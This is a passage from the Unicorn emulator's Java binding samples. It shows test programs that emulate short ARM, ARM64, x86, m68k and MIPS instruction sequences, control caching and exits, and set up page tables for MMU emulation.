0); // now print out some registers System.out.print(">>> Emulation done. Below is the CPU context\n"); System.out.format(">>> SP = 0x%x\n", u.reg_read(UC_ARM_REG_SP)); } public static void test_armeb() { long r0 = 0x1234L; // R0 register long r2 = 0x6789L; // R2 register long r3 = 0x3333L; // R3 register System.out.println("Emulate ARM Big-Endian code"); // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, ARM_CODE_EB); // initialize machine registers uc.reg_write(UC_ARM_REG_R0, r0); uc.reg_write(UC_ARM_REG_R2, r2); uc.reg_write(UC_ARM_REG_R3, r3); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + ARM_CODE_EB.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> R0 = 0x%x\n", uc.reg_read(UC_ARM_REG_R0)); System.out.format(">>> R1 = 0x%x\n", uc.reg_read(UC_ARM_REG_R1)); } public static void test_thumbeb() { long sp = 0x1234L; System.out.println("Emulate THUMB Big-Endian code"); // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM, UC_MODE_THUMB + UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, THUMB_CODE_EB); // initialize machine registers uc.reg_write(UC_ARM_REG_SP, sp); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. // Note we start at ADDRESS | 1 to indicate THUMB mode. uc.emu_start(ADDRESS | 1, ADDRESS + THUMB_CODE_EB.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> SP = 0x%x\n", uc.reg_read(UC_ARM_REG_SP)); } public static void test_thumb_mrs() { System.out.println("Emulate THUMB MRS instruction"); // 0xf3ef8014 - mrs r0, control // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM, UC_MODE_THUMB); // Setup the cpu model. uc.ctl_set_cpu_model(UC_CPU_ARM_CORTEX_M33); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, THUMB_CODE_MRS); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. // Note we start at ADDRESS | 1 to indicate THUMB mode. uc.emu_start(ADDRESS | 1, ADDRESS + THUMB_CODE_MRS.length, 0, 1); // now print out some registers System.out.println(">>> Emulation done. 
Below is the CPU context"); long pc = uc.reg_read(UC_ARM_REG_PC); System.out.format(">>> PC = 0x%x\n", pc); if (pc != ADDRESS + 4) { System.out.format("Error, PC was 0x%x, expected was 0x%x.\n", pc, ADDRESS + 4); } } private static void test_thumb_ite_internal(boolean step, long[] r2r3) { Unicorn uc = new Unicorn(UC_ARCH_ARM, UC_MODE_THUMB); uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); uc.mem_write(ADDRESS, ARM_THUMB_COND_CODE); uc.reg_write(UC_ARM_REG_SP, 0x1234L); uc.reg_write(UC_ARM_REG_R2, 0); uc.reg_write(UC_ARM_REG_R3, 1); if (!step) { uc.emu_start(ADDRESS | 1, ADDRESS + ARM_THUMB_COND_CODE.length, 0, 0); } else { long addr = ADDRESS; for (int i = 0; i < ARM_THUMB_COND_CODE.length / 2; i++) { uc.emu_start(addr | 1, ADDRESS + ARM_THUMB_COND_CODE.length, 0, 1); addr = uc.reg_read(UC_ARM_REG_PC); } } r2r3[0] = uc.reg_read(UC_ARM_REG_R2); r2r3[1] = uc.reg_read(UC_ARM_REG_R3); } public static void test_thumb_ite() { long[] r2r3 = new long[2]; long[] step_r2r3 = new long[2]; System.out.println( "Emulate a THUMB ITE block as a whole or per instruction."); // Run once. System.out.println("Running the entire binary."); test_thumb_ite_internal(false, r2r3); System.out.format(">>> R2: %d\n", r2r3[0]); System.out.format(">>> R3: %d\n\n", r2r3[1]); // Step each instruction. System.out.println("Running the binary one instruction at a time."); test_thumb_ite_internal(true, step_r2r3); System.out.format(">>> R2: %d\n", step_r2r3[0]); System.out.format(">>> R3: %d\n\n", step_r2r3[1]); if (!Arrays.equals(r2r3, step_r2r3)) { System.out.println("Failed with ARM ITE blocks stepping!"); } } public static void test_read_sctlr() { System.out.println("Read the SCTLR register."); Unicorn uc = new Unicorn(UC_ARCH_ARM, UC_MODE_ARM); // SCTLR. See arm reference. Arm_CP reg = new Arm_CP(15, 0, 0, 1, 0, 0, 0); long val = (Long) uc.reg_read(UC_ARM_REG_CP_REG, reg); System.out.format(">>> SCTLR = 0x%x\n", val & 0xffffffffL); System.out.format(">>> SCTLR.IE = %d\n", (val >> 31) & 1); System.out.format(">>> SCTLR.B = %d\n", (val >> 7) & 1); } public static void main(String args[]) { test_arm(); System.out.print("==========================\n"); test_thumb(); System.out.print("==========================\n"); test_armeb(); System.out.print("==========================\n"); test_thumbeb(); System.out.print("==========================\n"); test_thumb_mrs(); System.out.print("==========================\n"); test_thumb_ite(); System.out.print("==========================\n"); test_read_sctlr(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_arm64.java000066400000000000000000000236561467524106700251660ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
*/ /* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate ARM64 code */ package samples; import java.util.Arrays; import unicorn.*; public class Sample_arm64 implements UnicornConst, Arm64Const { /** code to be emulated {@code str w11, [x13], #0; ldrb w15, [x13], #0} */ private static final byte[] ARM64_CODE = Utils.hexToBytes("ab0500b8af054038"); /** code to be emulated {@code str w11, [x13]; ldrb w15, [x13]} */ //private static final byte[] ARM64_CODE_EB = Utils.hexToBytes("b80005ab384005af"); // str w11, [x13]; private static final byte[] ARM64_CODE_EB = ARM64_CODE; /** code to be emulated {@code mrs x2, tpidrro_el0} */ private static final byte[] ARM64_MRS_CODE = Utils.hexToBytes("62d03bd5"); /** code to be emulated {@code paciza x1} */ private static final byte[] ARM64_PAC_CODE = Utils.hexToBytes("e123c1da"); // memory address where emulation starts public static final int ADDRESS = 0x10000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; public static void test_arm64_mem_fetch() { // mrs x0, CurrentEL byte[] shellcode0 = { 64, 66, 56, (byte) 213 }; // .text:00000000004002C0 LDR X1, [SP,#arg_0] byte[] shellcode = { (byte) 0xE1, 0x03, 0x40, (byte) 0xF9 }; long shellcode_address = 0x4002C0L; long data_address = 0x10000000000000L; System.out.format( ">>> Emulate ARM64 fetching stack data from high address %x\n", data_address); // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM64, UC_MODE_ARM); uc.mem_map(data_address, 0x30000, UC_PROT_ALL); uc.mem_map(0x400000, 0x1000, UC_PROT_ALL); uc.reg_write(UC_ARM64_REG_SP, data_address); byte[] data = new byte[8]; Arrays.fill(data, (byte) 0xc8); uc.mem_write(data_address, data); uc.mem_write(shellcode_address, shellcode0); uc.mem_write(shellcode_address + 4, shellcode); uc.emu_start(shellcode_address, shellcode_address + 4, 0, 0); long x0 = uc.reg_read(UC_ARM64_REG_X0); /* CurrentEL holds the exception level in bits [3:2], hence the shift */ System.out.format(">>> x0(Exception Level)=%x\n", x0 >> 2); uc.emu_start(shellcode_address + 4, shellcode_address + 8, 0, 0); long x1 = uc.reg_read(UC_ARM64_REG_X1); System.out.format(">>> X1 = 0x%x\n", x1); } public static void test_arm64() { long x11 = 0x12345678; // X11 register long x13 = 0x10000 + 0x8; // X13 register long x15 = 0x33; // X15 register System.out.println("Emulate ARM64 code"); // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM64, UC_MODE_ARM); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, ARM64_CODE); // initialize machine registers uc.reg_write(UC_ARM64_REG_X11, x11); uc.reg_write(UC_ARM64_REG_X13, x13); uc.reg_write(UC_ARM64_REG_X15, x15); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + ARM64_CODE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. 
Below is the CPU context"); System.out.println(">>> As little endian, X15 should be 0x78:"); System.out.format(">>> X15 = 0x%x\n", uc.reg_read(UC_ARM64_REG_X15)); } public static void test_arm64eb() { long x11 = 0x12345678; // X11 register long x13 = 0x10000 + 0x8; // X13 register long x15 = 0x33; // X15 register System.out.println("Emulate ARM64 Big-Endian code"); // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM64, UC_MODE_ARM + UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, ARM64_CODE_EB); // initialize machine registers uc.reg_write(UC_ARM64_REG_X11, x11); uc.reg_write(UC_ARM64_REG_X13, x13); uc.reg_write(UC_ARM64_REG_X15, x15); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + ARM64_CODE_EB.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.println(">>> As big endian, X15 should be 0x78:"); System.out.format(">>> X15 = 0x%x\n", uc.reg_read(UC_ARM64_REG_X15)); } public static void test_arm64_sctlr() { long val; System.out.println("Read the SCTLR register."); Unicorn uc = new Unicorn(UC_ARCH_ARM64, UC_MODE_LITTLE_ENDIAN | UC_MODE_ARM); // SCTLR_EL1. See arm reference. Arm64_CP reg = new Arm64_CP(1, 0, 3, 0, 0); val = (long) uc.reg_read(UC_ARM64_REG_CP_REG, reg); System.out.format(">>> SCTLR_EL1 = 0x%x\n", val); reg.op1 = 0b100; val = (long) uc.reg_read(UC_ARM64_REG_CP_REG, reg); System.out.format(">>> SCTLR_EL2 = 0x%x\n", val); } private static final Arm64SysHook hook_mrs = (uc, reg, cp_reg, user_data) -> { System.out.println(">>> Hook MRS instruction. Write 0x114514 to X2."); uc.reg_write(reg, 0x114514L); // Skip return 1; }; public static void test_arm64_hook_mrs() { System.out.println("Hook MRS instruction."); Unicorn uc = new Unicorn(UC_ARCH_ARM64, UC_MODE_LITTLE_ENDIAN | UC_MODE_ARM); uc.mem_map(0x1000, 0x1000, UC_PROT_ALL); uc.mem_write(0x1000, ARM64_MRS_CODE); uc.hook_add(hook_mrs, UC_ARM64_INS_MRS, 1, 0, null); uc.emu_start(0x1000, 0x1000 + ARM64_MRS_CODE.length, 0, 0); System.out.format(">>> X2 = 0x%x\n", uc.reg_read(UC_ARM64_REG_X2)); } /* Test PAC support in the emulator. 
Code adapted from https://github.com/unicorn-engine/unicorn/issues/1789#issuecomment-1536320351 */ public static void test_arm64_pac() { long x1 = 0x0000aaaabbbbccccL; System.out.println("Try ARM64 PAC"); // Initialize emulator in ARM mode Unicorn uc = new Unicorn(UC_ARCH_ARM64, UC_MODE_ARM); uc.ctl_set_cpu_model(UC_CPU_ARM64_MAX); uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); uc.mem_write(ADDRESS, ARM64_PAC_CODE); uc.reg_write(UC_ARM64_REG_X1, x1); /** Initialize PAC support **/ Arm64_CP reg; // SCR_EL3 reg = new Arm64_CP(1, 1, 3, 6, 0); reg.val = (Long) uc.reg_read(UC_ARM64_REG_CP_REG, reg); // NS && RW && API reg.val |= (1 | (1L << 10) | (1L << 17)); uc.reg_write(UC_ARM64_REG_CP_REG, reg); // SCTLR_EL1 reg = new Arm64_CP(1, 0, 3, 0, 0); reg.val = (Long) uc.reg_read(UC_ARM64_REG_CP_REG, reg); // EnIA && EnIB reg.val |= (1L << 31) | (1L << 30); uc.reg_write(UC_ARM64_REG_CP_REG, reg); // HCR_EL2 reg = new Arm64_CP(1, 1, 3, 4, 0); reg.val = (Long) uc.reg_read(UC_ARM64_REG_CP_REG, reg); // HCR.API reg.val |= (1L << 41); uc.reg_write(UC_ARM64_REG_CP_REG, reg); /** Check that PAC worked **/ uc.emu_start(ADDRESS, ADDRESS + ARM64_PAC_CODE.length, 0, 0); long new_x1 = uc.reg_read(UC_ARM64_REG_X1); System.out.format("X1 = 0x%x\n", new_x1); if (new_x1 == x1) { System.out.println("FAIL: No PAC tag added!"); } else { // Expect 0x1401aaaabbbbccccULL with the default key System.out.println("SUCCESS: PAC tag found."); } } public static void main(String args[]) { test_arm64_mem_fetch(); System.out.println("-------------------------"); test_arm64(); System.out.println("-------------------------"); test_arm64eb(); System.out.println("-------------------------"); test_arm64_sctlr(); System.out.println("-------------------------"); test_arm64_hook_mrs(); System.out.println("-------------------------"); test_arm64_pac(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_ctl.java000066400000000000000000000122141467524106700250030ustar00rootroot00000000000000package samples; import java.util.Arrays; import unicorn.*; public class Sample_ctl implements UnicornConst, X86Const { /** Code to be emulated *
     *   cmp eax, 0;
     *   jg lb;
     *   inc eax;
     *   nop;
     * lb:
     *   inc ebx;
     *   nop;
     * 
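     * (Assembled byte layout, worked out from the hex string below: cmp at
     * offset 0, jg at 3, inc eax at 5, nop at 6, inc ebx at 7, nop at 8, so
     * the exit addresses used in test_uc_ctl_exits land on the two nops.)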
*/ private static final byte[] X86_JUMP_CODE = Utils.hexToBytes("83f8007f0240904390"); /** memory address where emulation starts */ private static final long ADDRESS = 0x10000; public static void test_uc_ctl_read() { System.out.println("Reading some properties by uc_ctl."); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // Let's query some properties by uc_ctl. int mode = uc.ctl_get_mode(); int arch = uc.ctl_get_arch(); long timeout = uc.ctl_get_timeout(); int pagesize = uc.ctl_get_page_size(); System.out.format(">>> mode = %d, arch = %d, timeout=%d, pagesize=%d\n", mode, arch, timeout, pagesize); } private static final EdgeGeneratedHook trace_new_edge = (uc, cur, prev, data) -> { System.out.format(">>> Getting a new edge from 0x%x to 0x%x.\n", prev.pc + prev.size - 1, cur.pc); }; public static void test_uc_ctl_exits() { long r_eax, r_ebx; long exits[] = { ADDRESS + 6, ADDRESS + 8 }; System.out.println("Using multiple exits by uc_ctl."); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); uc.mem_map(ADDRESS, 0x1000, UC_PROT_ALL); // Write our code to the memory. uc.mem_write(ADDRESS, X86_JUMP_CODE); // We trace if any new edge is generated. uc.hook_add(trace_new_edge, 1, 0, null); // Enable multiple exits. uc.ctl_exits_enabled(true); uc.ctl_set_exits(exits); // This should stop at ADDRESS + 6 and increase eax, even though we don't // provide an exit. uc.emu_start(ADDRESS, 0, 0, 0); r_eax = uc.reg_read(UC_X86_REG_EAX); r_ebx = uc.reg_read(UC_X86_REG_EBX); System.out.format( ">>> eax = %d and ebx = %d after the first emulation\n", r_eax, r_ebx); // This should stop at ADDRESS + 8, even though we don't provide an exit. uc.emu_start(ADDRESS, 0, 0, 0); r_eax = uc.reg_read(UC_X86_REG_EAX); r_ebx = uc.reg_read(UC_X86_REG_EBX); System.out.format( ">>> eax = %d and ebx = %d after the second emulation\n", r_eax, r_ebx); } private static final int TB_COUNT = 8; private static final int TCG_MAX_INSNS = 512; // from tcg.h private static final int CODE_LEN = TB_COUNT * TCG_MAX_INSNS; private static double time_emulation(Unicorn uc, long start, long end) { long t1 = System.nanoTime(); uc.emu_start(start, end, 0, 0); long t2 = System.nanoTime(); return (t2 - t1) / 1000000.0; } public static void test_uc_ctl_tb_cache() { byte[] code = new byte[CODE_LEN]; double standard, cached, evicted; System.out.println( "Controlling the TB cache in a finer granularity by uc_ctl."); // Fill the code buffer with NOP. Arrays.fill(code, (byte) 0x90); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); uc.mem_map(ADDRESS, 0x10000, UC_PROT_ALL); // Write our code to the memory. uc.mem_write(ADDRESS, code); // We trace if any new edge is generated. // Note: In this sample, there is only **one** basic block while multiple // translation blocks are generated due to QEMU tcg buffer limit. In this // case, we don't consider it as a new edge. uc.hook_add(trace_new_edge, 1, 0, null); // Do emulation without any cache. standard = time_emulation(uc, ADDRESS, ADDRESS + CODE_LEN); // Now we request cache for all TBs. for (int i = 0; i < TB_COUNT; i++) { TranslationBlock tb = uc.ctl_request_cache(ADDRESS + i * TCG_MAX_INSNS); System.out.format( ">>> TB is cached at 0x%x which has %d instructions with %d bytes.\n", tb.pc, tb.icount, tb.size); } // Do emulation with all TB cached. cached = time_emulation(uc, ADDRESS, ADDRESS + CODE_LEN); // Now we clear cache for all TBs. 
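// (Each call below passes a one-byte [start, start + 1) range, which should be enough to evict the translation block covering that address.)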
        for (int i = 0; i < TB_COUNT; i++) {
            uc.ctl_remove_cache(ADDRESS + i * TCG_MAX_INSNS,
                ADDRESS + i * TCG_MAX_INSNS + 1);
        }

        // Do emulation with all TB cache evicted.
        evicted = time_emulation(uc, ADDRESS, ADDRESS + CODE_LEN);

        System.out.format(
            ">>> Run time: First time: %fms, Cached: %fms, Cache evicted: %fms\n",
            standard, cached, evicted);
    }

    public static final void main(String[] args) {
        test_uc_ctl_read();
        System.out.println("====================");
        test_uc_ctl_exits();
        System.out.println("====================");
        test_uc_ctl_tb_cache();
    }
}
unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_m68k.java000066400000000000000000000132201467524106700250060ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine

Copyright(c) 2015 Chris Eagle

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2 as published by the Free Software Foundation.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/

/* Unicorn Emulator Engine */
/* By Loi Anh Tuan, 2015 */

/* Sample code to demonstrate how to emulate m68k code */

package samples;

import unicorn.*;

public class Sample_m68k implements UnicornConst, M68kConst {

    // code to be emulated
    public static final byte[] M68K_CODE = { 118, -19 }; // movq #-19, %d3

    // memory address where emulation starts
    public static final int ADDRESS = 0x10000;

    // callback for tracing basic blocks
    private static final BlockHook hook_block =
        (uc, address, size, user_data) -> {
            System.out.format(
                ">>> Tracing basic block at 0x%x, block size = 0x%x\n",
                address, size);
        };

    // callback for tracing instructions
    private static final CodeHook hook_code =
        (uc, address, size, user_data) -> {
            System.out.format(
                ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n",
                address, size);
        };

    public static void test_m68k() {
        long d0 = 0x0000L; // d0 data register
        long d1 = 0x0000L; // d1 data register
        long d2 = 0x0000L; // d2 data register
        long d3 = 0x0000L; // d3 data register
        long d4 = 0x0000L; // d4 data register
        long d5 = 0x0000L; // d5 data register
        long d6 = 0x0000L; // d6 data register
        long d7 = 0x0000L; // d7 data register

        long a0 = 0x0000L; // a0 address register
        long a1 = 0x0000L; // a1 address register
        long a2 = 0x0000L; // a2 address register
        long a3 = 0x0000L; // a3 address register
        long a4 = 0x0000L; // a4 address register
        long a5 = 0x0000L; // a5 address register
        long a6 = 0x0000L; // a6 address register
        long a7 = 0x0000L; // a7 address register

        long pc = 0x0000L; // program counter
        long sr = 0x0000L; // status register

        System.out.print("Emulate M68K code\n");

        // Initialize emulator in M68K mode
        Unicorn u = new Unicorn(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN);

        // map 2MB memory for this emulation
        u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

        // write machine code to be emulated to memory
        u.mem_write(ADDRESS, M68K_CODE);

        // initialize machine registers
        u.reg_write(UC_M68K_REG_D0, d0);
        u.reg_write(UC_M68K_REG_D1, d1);
        u.reg_write(UC_M68K_REG_D2, d2);
        u.reg_write(UC_M68K_REG_D3, d3);
        u.reg_write(UC_M68K_REG_D4, d4);
        u.reg_write(UC_M68K_REG_D5, d5);
        u.reg_write(UC_M68K_REG_D6, d6);
u.reg_write(UC_M68K_REG_D7, d7); u.reg_write(UC_M68K_REG_A0, a0); u.reg_write(UC_M68K_REG_A1, a1); u.reg_write(UC_M68K_REG_A2, a2); u.reg_write(UC_M68K_REG_A3, a3); u.reg_write(UC_M68K_REG_A4, a4); u.reg_write(UC_M68K_REG_A5, a5); u.reg_write(UC_M68K_REG_A6, a6); u.reg_write(UC_M68K_REG_A7, a7); u.reg_write(UC_M68K_REG_PC, pc); u.reg_write(UC_M68K_REG_SR, sr); // tracing all basic blocks with customized callback u.hook_add(hook_block, 1, 0, null); // tracing all instruction u.hook_add(hook_code, 1, 0, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. u.emu_start(ADDRESS, ADDRESS + M68K_CODE.length, 0, 0); // now print out some registers System.out.print(">>> Emulation done. Below is the CPU context\n"); d0 = u.reg_read(UC_M68K_REG_D0); d1 = u.reg_read(UC_M68K_REG_D1); d2 = u.reg_read(UC_M68K_REG_D2); d3 = u.reg_read(UC_M68K_REG_D3); d4 = u.reg_read(UC_M68K_REG_D4); d5 = u.reg_read(UC_M68K_REG_D5); d6 = u.reg_read(UC_M68K_REG_D6); d7 = u.reg_read(UC_M68K_REG_D7); a0 = u.reg_read(UC_M68K_REG_A0); a1 = u.reg_read(UC_M68K_REG_A1); a2 = u.reg_read(UC_M68K_REG_A2); a3 = u.reg_read(UC_M68K_REG_A3); a4 = u.reg_read(UC_M68K_REG_A4); a5 = u.reg_read(UC_M68K_REG_A5); a6 = u.reg_read(UC_M68K_REG_A6); a7 = u.reg_read(UC_M68K_REG_A7); pc = u.reg_read(UC_M68K_REG_PC); sr = u.reg_read(UC_M68K_REG_SR); System.out.format(">>> A0 = 0x%x\t\t>>> D0 = 0x%x\n", a0, d0); System.out.format(">>> A1 = 0x%x\t\t>>> D1 = 0x%x\n", a1, d1); System.out.format(">>> A2 = 0x%x\t\t>>> D2 = 0x%x\n", a2, d2); System.out.format(">>> A3 = 0x%x\t\t>>> D3 = 0x%x\n", a3, d3); System.out.format(">>> A4 = 0x%x\t\t>>> D4 = 0x%x\n", a4, d4); System.out.format(">>> A5 = 0x%x\t\t>>> D5 = 0x%x\n", a5, d5); System.out.format(">>> A6 = 0x%x\t\t>>> D6 = 0x%x\n", a6, d6); System.out.format(">>> A7 = 0x%x\t\t>>> D7 = 0x%x\n", a7, d7); System.out.format(">>> PC = 0x%x\n", pc); System.out.format(">>> SR = 0x%x\n", sr); } public static void main(String args[]) { test_m68k(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_mips.java000066400000000000000000000106351467524106700251760ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
*/ /* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate Mips code (big endian) */ package samples; import unicorn.*; public class Sample_mips implements UnicornConst, MipsConst { // code to be emulated public static final byte[] MIPS_CODE_EB = { 52, 33, 52, 86 }; // ori $at, $at, 0x3456 public static final byte[] MIPS_CODE_EL = { 86, 52, 33, 52 }; // ori $at, $at, 0x3456 // memory address where emulation starts public static final int ADDRESS = 0x10000; // callback for tracing basic blocks private static class MyBlockHook implements BlockHook { public void hook(Unicorn u, long address, int size, Object user_data) { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); } } // callback for tracing instruction private static class MyCodeHook implements CodeHook { public void hook(Unicorn u, long address, int size, Object user_data) { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); } } public static void test_mips_eb() { long r1 = 0x6789L; // R1 register System.out.println("Emulate MIPS code (big-endian)"); // Initialize emulator in MIPS mode Unicorn u = new Unicorn(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, MIPS_CODE_EB); // initialize machine registers u.reg_write(UC_MIPS_REG_1, r1); // tracing all basic blocks with customized callback u.hook_add(new MyBlockHook(), 1, 0, null); // tracing one instruction at ADDRESS with customized callback u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. u.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EB.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); r1 = u.reg_read(UC_MIPS_REG_1); System.out.format(">>> R1 = 0x%x\n", r1); } public static void test_mips_el() { long r1 = 0x6789L; // R1 register System.out.println("Emulate MIPS code (little-endian)"); // Initialize emulator in MIPS mode Unicorn u = new Unicorn(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, MIPS_CODE_EL); // initialize machine registers u.reg_write(UC_MIPS_REG_1, r1); // tracing all basic blocks with customized callback u.hook_add(new MyBlockHook(), 1, 0, null); // tracing one instruction at ADDRESS with customized callback u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. u.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EL.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); r1 = u.reg_read(UC_MIPS_REG_1); System.out.format(">>> R1 = 0x%x\n", r1); } public static void main(String args[]) { test_mips_eb(); System.out.println("==========================="); test_mips_el(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_mmu.java000066400000000000000000000173431467524106700250270ustar00rootroot00000000000000package samples; import unicorn.*; public class Sample_mmu implements UnicornConst, X86Const { /** Code: *
     * mov rax, 57
     * syscall
     * test rax, rax
     * jz child
     * xor rax, rax
     * mov rax, 60
     * mov [0x4000], rax
     * syscall
     *
     * child:
     * xor rcx, rcx
     * mov rcx, 42
     * mov [0x4000], rcx
     * mov rax, 60
     * syscall
     * 
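     * <p>(The syscalls are not real: the hook below treats rax=57 as a
     * fork, faking a child pid of 27 in the parent run, and rax=60 as
     * exit; each stops emulation so the driver can swap page mappings.)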
     */
    private static final byte[] CODE = Utils.hexToBytes(
        "B8390000000F054885C0740FB83C00000048890425004000000F05B92A00000048890C2500400000B83C0000000F05");

    private static final MemHook mmu_write_callback =
        (uc, type, address, size, value, user_data) -> {
            System.out.format("write at 0x%x: 0x%x\n", address, value);
        };

    private static void x86_mmu_prepare_tlb(Unicorn uc, long vaddr,
            long tlb_base) {
        long cr0;
        long cr4;
        X86_MSR msr = new X86_MSR(0xC0000080);
        long pml4o = ((vaddr & 0x00ff8000000000L) >> 39) * 8;
        long pdpo = ((vaddr & 0x00007fc0000000L) >> 30) * 8;
        long pdo = ((vaddr & 0x0000003fe00000L) >> 21) * 8;
        long pml4e = (tlb_base + 0x1000L) | 1 | (1 << 2);
        long pdpe = (tlb_base + 0x2000L) | 1 | (1 << 2);
        long pde = (tlb_base + 0x3000L) | 1 | (1 << 2);
        uc.mem_write(tlb_base + pml4o, Utils.toBytes(pml4e));
        uc.mem_write(tlb_base + 0x1000 + pdpo, Utils.toBytes(pdpe));
        uc.mem_write(tlb_base + 0x2000 + pdo, Utils.toBytes(pde));
